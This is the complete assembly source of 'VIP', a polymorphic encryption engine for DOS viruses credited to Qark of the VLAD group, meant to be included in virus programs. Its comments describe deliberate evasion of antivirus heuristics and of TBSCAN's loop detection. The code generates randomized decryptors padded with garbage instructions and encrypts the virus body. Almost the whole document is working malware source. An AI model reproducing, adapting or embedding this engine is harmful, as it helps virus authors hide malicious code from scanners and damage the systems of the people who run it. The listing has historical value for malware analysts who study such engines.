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- ;
- ; VLAD Infinite Polymorphic - VIP
- ; by Qark - VLAD
- ;
- ; This engine is good in some respects, and poor in others.
- ; The encryption it creates is fairly easy to crack, being a looping
- ; xor with a keychange (all registers/values chosen at random),
- ; but the encryption loops are very hard to detect. There are four
- ; different loop types, of which TBSCAN can only find two.
- ;
- ; At the start of the decryptor, the engine won't produce some instructions
- ; that flag heuristics. For this reason, VIP avoids alot of the heuristic
- ; problems most other garbage generators have. For example:
- ; Doesn't produce INC/DEC in the first 20 bytes to avoid flags.
- ; Doesn't produce memory operations in the first 10 bytes.
- ; Doesn't produce XCHG in the first 10 bytes.
- ; Always uses the short version of instructions (AX/AL Imm etc)
- ;
- ; One problem that couldn't be avoided is the creation of FFFF word pointers
- ; causing crashes. The likelihood of them occurring is low (about 1 in 300
- ; samples) because danger instructions have been put to a minimum.
- ; (eg mov ax,[bx-1] bx=0, isn't produced anymore).
- ;
- ; If you're wondering why the polymorphism produced isn't changing, that's
- ; because it's an example of slow polymorphism.
- ;
- ; To assemble, use it as an include file for the program that calls it.
- ;
- VIP:
- ;On entry:
- ; AL = 1 if COM file
- ; DS:SI = Points to the unencrypted virus
- ; ES:DI = Place to store encrypted virus
- ; CX = length of virus
- ; BP = delta offset
- ; Assumes CS=DS=ES
- ;On return:
- ; CX = length of decryptor + encrypted code
- cld
- mov word ptr saved_cx,cx
- mov word ptr saved_di,di
- mov word ptr saved_si,si
- mov byte ptr segtype,al
- mov byte ptr inloop,0 ;Initialise variable
- ;Initialise our randomisation for slow polymorphism.
- call init_rand
- ;Clear the register table
- call unmark_all
- ;Clear the displacements
- call clear_displacement
- ;Select a random decryption type.
- rand_routine:
- call get_rand
- mov si,offset dec_type
- and ax,3*2
- add si,ax
- mov ax,word ptr [si]
- jmp ax
- Standard:
- ;Uses 'standard' encryption.
- ; ----This is a basic layout of the decryptor----
- ; mov pointer,offset virus_start
- ; mov cipher,xorval
- ; loop:
- ; xor word ptr pointer,cipher
- ; inc pointer
- ; inc pointer
- ; cmp pointer,virus_start+virlength
- ; jne loop
- ; virus_start:
- ; -----------------------------------------------
- call startup ;Setup pointer and cipher
- mov byte ptr inloop,1
- mov word ptr loopstart,di
- call encrypt_type
- or al,0f8h
- mov ah,al
- mov al,81h ;CMP pointer,xxxx
- stosw
- call round_up
- add ax,word ptr pointer1val
- stosw
- call handle_jne ;JNE xx
- call calc_jne
- mov byte ptr inloop,0
- ;Calculate the displacement
- call fix_displacements
- call encrypt_virus
- call decryptor_size
- ret
- Stack1:
- ;Use the stack method for encryption. This method doesnt work on EXE's
- ;because SS <> CS.
- ; ----This is a basic layout of the decryptor----
- ; mov sp,offset virus_start
- ; mov cipher,xor_val
- ; loop:
- ; pop reg
- ; xor reg,cipher
- ; push reg
- ; pop randomreg
- ; cmp sp,virus_start+virus_length
- ; jne loop
- ; -----------------------------------------------
- cmp byte ptr segtype,0
- jne stack1_ok
- jmp rand_routine
- stack1_ok:
- call rand_garbage
- call rand_garbage
- mov al,0bch ;MOV SP,xxxx
- stosb
- mov word ptr displace,di
- mov ax,bp
- stosw
- call setup_cipher
- mov byte ptr inloop,1
- mov word ptr loopstart,di
- call select_reg
- call rand_garbage
- push ax
- or al,58h ;POP reg
- stosb
- call rand_garbage
- mov al,33h ;XOR reg,reg
- stosb
- pop ax
- push ax
- push cx
- mov cl,3
- shl al,3
- or al,byte ptr cipher
- or al,0c0h
- stosb
- pop cx
- call rand_garbage
- pop ax
- or al,50h ;PUSH reg
- stosb
- call rand_garbage
- next_pop:
- call get_rand
- call check_reg
- jc next_pop
- and al,7
- or al,58h ;POP reg (=add sp,2)
- stosb
- call rand_garbage
- mov ax,0fc81h ;CMP SP,xxxx
- stosw
- mov word ptr displace2,di
- call round_up
- add ax,bp
- stosw
- call handle_jne
- call calc_jne
- mov byte ptr inloop,0
- mov al,0bch ;mov sp,0fffeh
- stosb
- mov ax,0fffeh
- stosw
- call rand_garbage
- ;Calculate the displacement
- call fix_displacements
- mov si,word ptr saved_si
- mov cx,word ptr saved_cx
- inc cx
- shr cx,1
- mov bx,word ptr xorval
- enc_stack1:
- lodsw
- xor ax,bx
- stosw
- loop enc_stack1
- call decryptor_size
- ret
- Call_Enc:
- ;Uses recursive calls to decrypt the virus. Needs a big stack or else it will
- ;crash.
- ; ----This is a basic layout of the decryptor----
- ; mov pointer,offset virus_start
- ; mov cipher,xorval
- ; loop:
- ; cmp pointer,virus_start+virus_length
- ; jne small_dec
- ; ret
- ; small_dec:
- ; xor word ptr pointer,cipher
- ; inc pointer
- ; inc pointer
- ; call loop
- ; add sp,virus_length-2
- ; -----------------------------------------------
- call startup
- mov byte ptr inloop,1
- mov word ptr loopback,di
- call rand_garbage
- mov al,byte ptr pointer
- or al,0f8h
- mov ah,al
- mov al,81h ;CMP pointer,xxxx
- stosw
- call round_up
- add ax,word ptr pointer1val
- stosw
- call handle_jne
- mov word ptr loopf,di
- stosb
- call rand_garbage
- mov al,0c3h ;RET
- stosb
- call rand_garbage
- mov ax,di ;Fix the JNE.
- mov si,word ptr loopf
- inc si
- sub ax,si
- dec si
- mov byte ptr [si],al
- call encrypt_type
- mov al,0e8h ;CALL xxxx
- stosb
- mov ax,di
- inc ax
- inc ax
- sub ax,word ptr loopback
- neg ax
- stosw
- mov byte ptr inloop,0
- call rand_garbage
- mov ax,0c481h
- stosw
- mov ax,word ptr saved_cx
- dec ax
- dec ax
- stosw
- call rand_garbage
- ;Calculate the displacement
- call fix_displacements
- call encrypt_virus
- call decryptor_size
- ret
- Call_Enc2:
- ;Decrypts the virus from within a call.
- ; ----This is a basic layout of the decryptor----
- ; mov pointer,offset virus_start
- ; mov cipher,xorval
- ; call decrypt
- ; jmp short virus_start
- ; decrypt:
- ; xor pointer,cipher
- ; inc pointer
- ; inc pointer
- ; cmp pointer,virus_start+viruslength
- ; jne decrypt
- ; ret
- ; -----------------------------------------------
- call startup
- mov byte ptr inloop,1
- mov al,0e8h ;CALL xxxx
- stosb
- stosw
- mov word ptr loopf16,di
- call rand_garbage
- mov al,0e9h ;JMP xxxx
- stosb
- mov word ptr displace2,di
- ; mov ax,di
- ; inc ax
- ; inc ax
- ; sub ax,saved_di
- ; neg ax
- stosw
- call rand_garbage
- call rand_garbage
- mov ax,di
- mov si,word ptr loopf16
- sub ax,si
- mov word ptr [si-2],ax
- mov word ptr loopstart,di
- call encrypt_type
- or al,0f8h
- mov ah,al
- mov al,81h ;CMP pointer,xxxx
- stosw
- call round_up
- add ax,word ptr pointer1val
- stosw
- call handle_jne
- call calc_jne
- mov al,0c3h ;ret
- stosb
- mov byte ptr inloop,0
- call rand_garbage
- mov ax,di
- mov si,word ptr displace2
- sub ax,si
- dec ax
- dec ax
- mov [si],ax
- mov word ptr displace2,0
- call rand_garbage
- ;Calculate the displacement
- call fix_displacements
- call encrypt_virus
- call decryptor_size
- ret
- db 'VIP V1.0 by Qark/VLAD'
- ;All the different encryption types
- dec_type dw offset stack1
- dw offset call_enc
- dw offset call_enc2
- dw offset standard
- segtype db 0 ;1 if com file
- saved_cx dw 0 ;the initial CX
- saved_di dw 0 ;the initial DI
- saved_si dw 0
- displace dw 0
- displace2 dw 0
- dw 0
- displaceb dw 0
- inloop db 0 ;=1 if inside a loop else 0
- ;if set no 'word ptr' instructions made
- loopstart dw 0 ;for backwards 8 bit
- loopf dw 0 ;for forwards 8 bit
- loopback dw 0 ;backwards 16 bit
- loopf16 dw 0 ;forwards 16 bit
- xorval dw 0
- cipher db 0
- r_m db 0 ;The r-m of the pointer
- ;�������������������������������������������������������
- ;General routines, used universally
- ;�������������������������������������������������������
- Check_Reg:
- ;Returns a carry if the register in lower 3 bits of al is bad
- push ax
- push si
- and ax,7
- mov si,offset reg
- add si,ax
- cmp byte ptr [si],0
- pop si
- pop ax
- je ok_reg
- stc
- ret
- ok_reg:
- clc
- ret
- ; ax,cx,dx,bx,sp,bp,si,di
- reg db 00,00,00,00,01,00,00,00
- Mark_Reg:
- ;Mark a register as used, AL=reg
- push ax
- push si
- and ax,7
- mov si,offset reg
- add si,ax
- mov byte ptr [si],1
- pop si
- pop ax
- ret
- UnMark_All:
- ;Clears the register table, and sets SP
- push ax
- push di
- push cx
- mov di,offset reg
- mov al,0
- mov cx,8
- cs:
- rep stosb
- mov byte ptr cs:[reg+4],1 ;set sp
- pop cx
- pop di
- pop ax
- ret
- Clear_Displacement:
- ;Clears all the displacement variables
- push di
- push ax
- mov di,offset displace
- xor ax,ax
- stosw
- stosw
- stosw
- stosw
- stosw
- pop ax
- pop di
- ret
- Select_Pointer:
- ;Select an r-m as a pointer, you must call this routine before reserving
- ;any registers. Updates the variable r_m.
- push ax
- push si
- call get_rand
- and ax,7
- mov byte ptr r_m,al
- call index_2_pointer
- mov al,byte ptr [si]
- call mark_reg
- inc si
- mov al,byte ptr [si]
- cmp al,0
- je no_pointer2
- call mark_reg
- no_pointer2:
- pop si
- pop ax
- ret
- Setup_Pointer:
- ;Sets up the registers specified in the r-m with random values. These
- ;values are put into the variable 'pointval'.
- ;Moves the instructions into ES:DI.
- push ax
- push si
- call rand_garbage
- call index_2_pointer
- mov al,byte ptr [si]
- mov byte ptr pointer,al
- or al,0b8h ;MOV REG,xxxx
- stosb
- call get_rand
- stosw
- mov word ptr pointval,ax
- mov word ptr pointer1val,ax
- call rand_garbage
- mov al,byte ptr [si+1]
- cmp al,0
- je no_setupp2
- or al,0b8h ;MOV REG,xxxx
- stosb
- call get_rand
- stosw
- add word ptr pointval,ax
- call rand_garbage
- no_setupp2:
- pop si
- pop ax
- ret
- Index_2_Pointer:
- ;Sets SI to the 'pointers' table of the r_m
- push ax
- xor ax,ax
- mov al,byte ptr r_m
- shl ax,1
- mov si,offset pointers
- add si,ax
- pop ax
- ret
- pointer db 0 ;the first register
- pointer1val dw 0 ;the value of the first register
- pointval dw 0
- Pointers db 3,6 ;[bx+si]
- db 3,7 ;[bx+di]
- db 5,6 ;[bp+si]
- db 5,7 ;[bp+di]
- db 6,0 ;[si]
- db 7,0 ;[di]
- db 5,0 ;[bp]
- db 3,0 ;[bx]
- Select_Reg:
- ;Reserves a random register, and passes it out in AL
- ;AH is destroyed
- call get_rand
- call check_reg
- jc select_reg
- and al,7
- call mark_reg
- ret
- Setup_Reg:
- ;Puts the value specified in BX, into the register specified in AL.
- ;-Needs Fixing- to add a possible SUB, and also the garbage generation needs
- ;to produce the same add/sub opcodes.
- push ax
- push bx
- call rand_garbage
- and al,7
- push ax
- or al,0b8h ;MOV reg,xxxx
- stosb
- call get_rand
- sub bx,ax
- stosw
- call rand_garbage
- pop ax
- cmp al,0
- jne long_addreg
- mov al,5 ;ADD AX,xxxx
- stosb
- jmp short finish_add
- long_addreg:
- or al,0c0h
- mov ah,al
- mov al,81h
- stosw ;ADD reg,xxxx
- finish_add:
- mov ax,bx
- stosw
- call rand_garbage
- pop bx
- pop ax
- ret
- Seg_Override:
- ;Puts the correct segment before a memory write. The memory write must be
- ;called immediately afterwards.
- push ax
- cmp byte ptr segtype,1
- je no_segset
- mov al,2eh ;CS:
- stosb
- no_segset:
- pop ax
- ret
- Fix_Pointer:
- ;Fixes up the mod/rm field of a pointer instruction. Before this routine
- ;is called, the opcode field has already been stosb'd. eg for xor, 31h has
- ;been put into the current es:[di-1].
- ;on entry AL=register
- ;The displacement field (the following 2 bytes) must be fixed up manually.
- push ax
- push bx
- push cx
- mov cl,3
- shl al,cl
- or al,byte ptr r_m
- or al,80h
- stosb
- pop cx
- pop bx
- pop ax
- ret
- Dec_Inc_Reg:
- ;Inc/Dec's the reg in AL. AH= 0=inc 1=dec
- ;No garbage generators are called in this routine, because the flags
- ;may be important.
- push ax
- mov byte ptr dec_inc,ah
- call get_rand
- test al,1
- pop ax
- push ax
- jnz do_inc_dec
- cmp al,0 ;check for ax
- jne not_ax_incdec
- mov ax,0ff05h ;ADD AX,ffff = DEC AX
- cmp byte ptr dec_inc,0
- jne fdec1
- mov al,2dh ;SUB
- fdec1:
- stosw
- mov al,0ffh
- stosb
- pop ax
- ret
- not_ax_incdec:
- cmp byte ptr dec_inc,0
- je fdec2
- or al,0c0h
- jmp short fdec3
- fdec2:
- or al,0e8h
- fdec3:
- mov ah,al
- mov al,83h ;ADD reg,ffff = DEC reg
- stosw
- mov al,0ffh
- stosb
- pop ax
- ret
- do_inc_dec:
- or al,40h ;INC reg
- cmp byte ptr dec_inc,0
- je fdec4
- or al,8
- fdec4:
- stosb
- pop ax
- ret
- dec_inc db 0 ;0=inc 1=dec
- Round_Up:
- ;Rounds up the number in saved_cx to the nearest 2 and passes it out in AX.
- mov ax,word ptr saved_cx
- inc ax
- shr ax,1
- shl ax,1
- mov word ptr saved_cx,ax
- ret
- Fix_Displacements:
- ;Adds the size of the produced decyptors to the data listed in the
- ;displacement variables. 0 Values signal the end.
- ;DI=The final length of the 'decryptor'
- push ax
- push si
- mov ax,di
- sub ax,word ptr saved_di
- push di
- mov si,offset displace
- disp_loop:
- cmp word ptr [si],0
- je last_displacement
- mov di,[si]
- add [di],ax
- inc si
- inc si
- jmp short disp_loop
- last_displacement:
- pop di
- pop si
- pop ax
- ret
- Rand_Garbage:
- ;Generates 1-4 garbage instructions.
- push ax
- call get_rand
- and ax,07h
- push cx
- mov cx,ax
- inc cx
- start_garbage:
- call select_garbage
- loop start_garbage
- pop cx
- pop ax
- ret
- Select_Garbage:
- ;Selects a garbage routine to goto
- call get_rand
- and ax,14
- push si
- mov si,offset calls
- add si,ax
- mov ax,word ptr [si]
- pop si
- jmp ax
- calls dw offset Make_Inc_Dec
- dw offset Imm2Reg
- dw offset Rand_Instr
- dw offset Mov_Imm
- dw offset Make_Xchg
- dw offset Rand_Instr
- dw offset Mov_Imm
- dw offset Imm2Reg
- Make_Inc_Dec:
- ;Puts a word INC/DEC in ES:DI
- ;eg INC AX
- ; DEC BP
- mov ax,di
- sub ax,word ptr saved_di
- cmp ax,15
- ja not_poly_start ;inc/dec in the first 20 bytes, flags
- ret
- not_poly_start:
- call get_rand
- call check_reg
- jc make_inc_dec
- and al,0fh
- or al,40h
- test al,8
- jnz calc_dec
- stosb
- ret
- calc_dec:
- mov ah,al
- and al,7
- cmp al,2
- ja Make_Inc_Dec
- mov al,ah
- stosb
- ret
- Fix_Register:
- ;AX=random byte, where the expected outcome is ah=opcode al=mod/rm
- ;Carry is set if bad register. Word_Byte is updated to show word/byte.
- test ah,1
- jnz word_garbage
- mov byte ptr word_byte,0
- call check_breg
- jmp short byte_garbage
- word_garbage:
- mov byte ptr word_byte,1
- call check_reg
- byte_garbage:
- ret
- word_byte db 0 ;1=word, 0 = byte
- Imm2Reg:
- ;Immediate to register.
- call get_rand
- call fix_register
- jc imm2reg
- test al,7 ;AX/AL arent allowed (causes heuristics)
- jz imm2ax
- xchg al,ah
- and al,3
- cmp al,2 ;signed byte is bad
- je imm2reg
- or al,80h
- or ah,0c0h
- stosw
- test al,2 ;signed word
- jnz ione_stosb
- call get_rand
- cmp byte ptr word_byte,1
- jne ione_stosb
- stosb
- ione_stosb:
- call get_rand
- stosb
- ret
- imm2ax:
- xchg ah,al
- and al,3dh
- or al,4
- stosw
- test al,1
- jnz ione_stosb
- ret
- Rand_Instr:
- ;Creates a whole stack of instructions.
- ;and,or,xor,add,sub,adc,cmp,sbb
- mov ax,di
- sub ax,word ptr saved_di
- cmp ax,10
- ja not_poly_start2 ;in the first 20 bytes, flags G
- ret
- not_poly_start2:
- call get_rand
- ;Inloop stops xxx xx,word ptr [xxxx] instructions inside the
- ;loops. It changes them to 'byte ptr' which stops the ffff crash
- ;problem.
- cmp byte ptr inloop,1
- jne ok_words
- and ah,0feh
- ok_words:
- call fix_register
- jc rand_instr
- push cx
- mov cl,3
- rol al,cl
- pop cx
- xchg ah,al
- and al,039h
- or al,2 ;set direction flag
- stosb
- mov al,ah
- and al,0c0h
- cmp al,0c0h
- je zerobytedisp
- cmp al,0
- je checkdisp
- cmp al,80h
- je twobytedisp
- ;sign extended
- mov al,ah
- stosb
- negative_value:
- call get_rand
- cmp al,0ffh
- je negative_value
- stosb
- ret
- twobytedisp:
- mov al,ah
- stosb
- call get_rand
- stosw
- ret
- checkdisp:
- push ax
- and ah,7
- cmp ah,6
- pop ax
- je twobytedisp
- zerobytedisp:
- mov al,ah
- stosb
- ret
- Mov_Imm:
- ;Puts a MOV immediate instruction.
- call get_rand
- test al,8
- jnz word_mov
- call check_breg
- jmp short mov_check
- word_mov:
- call check_reg
- mov_check:
- jc mov_imm
- and al,0fh
- or al,0b0h
- stosb
- test al,8
- jnz mov_word
- call get_rand
- stosb
- ret
- mov_word:
- call get_rand
- stosw
- ret
- Init_Rand:
- ;Initialises the Get_Rand procedure.
- push ax
- push cx
- push dx
- push si
- push ds
- mov si,1
- mov ax,0ffffh ;Get word from ROM BIOS.
- mov ds,ax
- mov ax,word ptr [si]
- pop ds
- mov word ptr randseed,ax
- call get_rand
- push ax
- mov ah,2ah ;Get Date.
- int 21h ;call int21h
- pop ax
- add ax,cx
- xor ax,dx
- mov word ptr randseed,ax
- call get_rand
- pop si
- pop dx
- pop cx
- pop ax
- ret
- Get_Rand:
- ;Gets a random number in AX.
- push cx
- push dx
- mov ax,word ptr randseed
- mov cx,ax
- mov dx,ax
- and cx,1ffh
- or cl,01fh
- propogate:
- add dx,ax
- mul dx
- add ax,4321h
- neg ax
- ror dx,1
- loop propogate
- mov word ptr randseed,ax
- pop dx
- pop cx
- ret
- randseed dw 0
- Make_Xchg:
- mov ax,di
- sub ax,word ptr saved_di
- cmp ax,10
- ja not_poly_start3 ;inc/dec in the first 20 bytes, flags
- ret
- not_poly_start3:
- call get_rand
- call fix_register
- jc make_xchg
- push cx
- mov cl,3
- rol al,cl
- pop cx
- call fix_register
- jc make_xchg
- test ah,1
- jz xchg_8bit
- test al,7
- jz xchg_ax2
- test al,38h
- jz xchg_ax1
- xchg_8bit:
- and ax,13fh
- or ax,86c0h
- xchg ah,al
- stosw
- ret
- xchg_ax1:
- and al,7
- or al,90h
- stosb
- ret
- xchg_ax2:
- push cx
- mov cl,3
- ror al,cl
- pop cx
- jmp short xchg_ax1
- Check_bReg:
- ;Checks if an 8bit reg is used or not.
- ;AL=register
- push ax
- and al,3
- call check_reg
- pop ax
- ret
- Decryptor_Size:
- ;Calculate the size of the decryptor + code
- ;Entry: DI=everything done
- ;Exit : CX=total decryptor length
- mov cx,di
- sub cx,word ptr saved_di
- ret
- Setup_Cipher:
- ;Randomly selects a cipher register and initialises it with a value.
- ;Puts the register into the variable 'cipher' and the value into 'xorval'
- call rand_garbage
- call get_rand
- mov bx,ax
- mov word ptr xorval,ax
- call select_reg
- mov byte ptr cipher,al
- call setup_reg
- call rand_garbage
- ret
- Startup:
- ;Does the most common startup procedures. Puts some garbage, and sets
- ;up the pointer register.
- call rand_garbage
- call rand_garbage
- call select_pointer ;Setup pointer
- call setup_pointer
- call setup_cipher
- ret
- Handle_JNE:
- ;Randomly puts either JNE or JB at ES:DI.
- ;Must be called after the CMP instruction.
- push ax
- push si
- ;Test to make sure our pointer isnt going +ffff, if so, only use
- ;jne, not jnb.
- call round_up
- add ax,word ptr pointer1val
- jnc random_jne
- mov al,75h
- jmp short unrandom_jne
- random_jne:
- call get_rand
- and ax,1
- mov si,offset jne_table
- add si,ax
- mov al,byte ptr [si]
- unrandom_jne:
- stosb
- pop si
- pop ax
- ret
- jne_table db 75h ;JNE/JNZ
- db 72h ;JB/JNAE
- Calc_JNE:
- ;Calculates the distance needed to JMP backwards and puts it into ES:DI.
- ;On entry DI points to the byte after a JNE/JB instruction
- ; and 'loopstart' contains the offset of the loop.
- push ax
- mov ax,di
- inc ax
- sub ax,word ptr loopstart
- neg al
- stosb
- call rand_garbage
- pop ax
- ret
- Increase_Pointer:
- ;Increases the register specified in 'pointer' by two.
- ;On exit AL=pointer register.
- call rand_garbage
- xor ax,ax
- mov al,byte ptr pointer
- call dec_inc_reg
- call rand_garbage
- call dec_inc_reg
- call rand_garbage
- ret
- Encrypt_Type:
- ;Selects the type of encryption and sets everything up.
- call rand_garbage
- call seg_override
- call rand3
- mov al,byte ptr [si+1]
- mov byte ptr encbyte,al
- mov al,byte ptr [si] ;The instruction from 'enc_table'
- stosb
- mov al,byte ptr cipher
- call fix_pointer
- mov word ptr displace,di
- mov ax,bp
- sub ax,word ptr pointval
- stosw
- call rand_garbage
- call rand3
- mov al,byte ptr [si+2]
- or al,0c3h
- mov byte ptr encb2,al
- cmp byte ptr cipher,0
- jne fix_16imm
- mov al,byte ptr [si+2]
- or al,5
- stosb
- jmp short set_imm
- fix_16imm:
- mov al,81h
- stosb
- mov al,byte ptr [si+2]
- or al,0c0h
- or al,byte ptr cipher
- stosb
- set_imm:
- call get_rand
- stosw
- mov word ptr encval2,ax
- call increase_pointer
- ret
- enc_table db 31h ;XOR ;Direct word operation
- db 33h ;XOR reg,reg ;Undo..
- db 30h
- db 01h ;ADD
- db 2bh ;SUB reg,reg
- db 0 ;ADD
- db 29h ;SUB
- db 03h ;ADD reg,reg
- db 28h
- Rand3:
- ;Gets a number in ax, either 0,4,8, and indexes SI that distance into
- ;enc_table.
- encrypt_rand:
- call get_rand
- mov cx,3
- xor dx,dx
- div cx
- mov ax,dx
- xor dx,dx
- mul cx
- mov si,offset enc_table
- add si,ax
- ret
- Encrypt_Virus:
- mov si,word ptr saved_si
- mov cx,word ptr saved_cx
- inc cx
- shr cx,1
- mov bx,word ptr xorval
- enc_loop:
- lodsw
- ;op ax,bx
- encbyte db 0 ;op
- db 0c3h
- db 81h
- encb2 db 0
- encval2 dw 0
- stosw
- loop enc_loop
- ret